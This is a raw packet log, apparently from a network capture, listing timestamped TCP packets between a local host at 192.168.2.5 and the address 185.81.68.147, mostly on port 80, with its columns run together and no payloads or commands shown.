                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.685882092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.685935020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.685981035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.688121080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.688178062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.688241959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.690300941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.690371037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.690437078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.692543983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.692622900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.692637920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.694732904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.694816113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.694838047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.696965933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.697030067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.697062969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.699187040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.699250937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.699304104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.701384068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.701443911 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.701493979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.703649998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.703762054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.703766108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.705816984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.705956936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.705997944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.708018064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.708067894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.708143950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.710294962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.710349083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.710350037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.712467909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.712517023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.712568045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.714689970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.714737892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.714818001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.716888905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.716944933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.717010975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.719122887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.719170094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.719239950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.721374035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.721424103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.721432924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.723550081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.723592997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.723624945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.725766897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.725811005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.725933075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.728002071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.728048086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.728056908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.730220079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.730273962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.730379105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.732434034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.732520103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.732520103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.734668016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.734713078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.734782934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.736846924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.736903906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.736938000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.739075899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.739121914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.739203930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.741282940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.741345882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.741425037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.743470907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.743607998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.819808960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.819916010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.819997072 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.820672989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.820774078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.820820093 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:08.822602034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.965284109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.965401888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.969968081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.969986916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.970138073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.974653006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.974783897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.974874020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.979468107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.979563951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.979651928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.984225035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.984357119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.984450102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:10.989172935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.036412954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.051223993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.051239014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.051496029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.053108931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.078140974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.078157902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.078469992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.079754114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.079855919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.080007076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.082279921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.082317114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.082350969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.085552931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.085659027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.085763931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.088776112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.088855028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.088902950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.091867924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.091902971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.091969967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.094840050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.094875097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.094943047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.097815990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.097851992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.097918987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.100606918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.100754023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.100754976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.103760004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.103794098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.103859901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.106607914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.106642962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.106705904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.109457970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.109550953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.109627962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.112426996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.112502098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.112555981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.114388943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.114469051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.114593983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.116122007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.116190910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.116269112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.118222952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.118258953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.118552923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.120321989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.120356083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.120404005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.122275114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.122309923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.122339964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.124181986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.124260902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.124304056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.126262903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.126296997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.126326084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.128209114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.128285885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.128962994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.130224943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.130259991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.130291939 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.132213116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.132247925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.132281065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.134217024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.134269953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.134325981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.136193991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.136205912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.136303902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.138117075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.138171911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.138293982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.318248034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.318309069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.318378925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.319931984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.319960117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.320007086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.321471930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.321516991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.321563959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.323201895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.323213100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.323259115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.324723959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.324847937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.324891090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.326417923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.326427937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.326459885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.327970028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.328011990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.328041077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.329678059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.329688072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.329730988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.331229925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.331331968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.331353903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.332849979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.332961082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.332972050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.334475994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.334727049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.334814072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.336200953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.336211920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.336245060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.337681055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.337915897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.338000059 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.339351892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.339416981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.339418888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.341119051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.341129065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.341223001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.342585087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.342628002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.342751980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.344182014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.344294071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.344399929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.345782995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.345933914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.346045017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.347646952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.347686052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.347835064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.349167109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.349175930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.349220037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.350658894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.350693941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.350838900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.396965027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.432029963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462181091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462374926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462507010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462826014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.463249922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.463270903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.463308096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.464510918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.464550018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.464580059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.465814114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.465991020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.466094017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.467202902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.467215061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.467240095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.468460083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.468496084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.468513012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.469753981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.470020056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.470118999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.471100092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.471136093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.471215010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.472371101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.472496033 CET8049708185.81.68.147192.168.2.5
